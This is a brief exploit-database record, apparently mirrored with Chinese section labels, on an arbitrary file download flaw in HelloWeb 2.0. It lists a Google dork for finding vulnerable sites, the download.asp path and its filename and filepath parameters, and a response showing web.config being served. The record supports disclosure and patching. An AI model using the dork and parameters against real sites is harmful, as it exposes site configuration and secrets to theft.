漏洞关键信息 Edb-ID: 48659 CVE: N/A Author: BRPSD Type: WEBAPPS Platform: ASP Date: 2020-07-10 Vulnerable App: HelloWeb 2.0 漏洞详情 Vendor Homepage: https://helloweb.co.kr/ Version: 2.0 (Latest) and previous versions Exploit Author: bRpsd Contact Author: cy[at]live.n Google Dork: inurl:exec/file/download.asp Type: WebApps / ASP Vulnerability: Arbitrary File Download 漏洞代码片段 漏洞描述 Vulnerability: Arbitrary File Download Location: http://localhost/exec/file/download.asp Parameters: filename & filepath Proof of Concept ```http HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/unknown; Charset=utf-8 Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT Server: Content-Transfer-Encoding: binary Content-Disposition: attachment; filename = web.config Set-Cookie: ASPSESSIONIDQCCBDRBB=BEMDPMDDKFHNFKFMMJGHIKKKI; path=/ Access-Control-Allow-Origin: * x-xss-protection: 1; mode=block Date: Thu, 09 Jul 2020 10:51:14 GMT Connection: close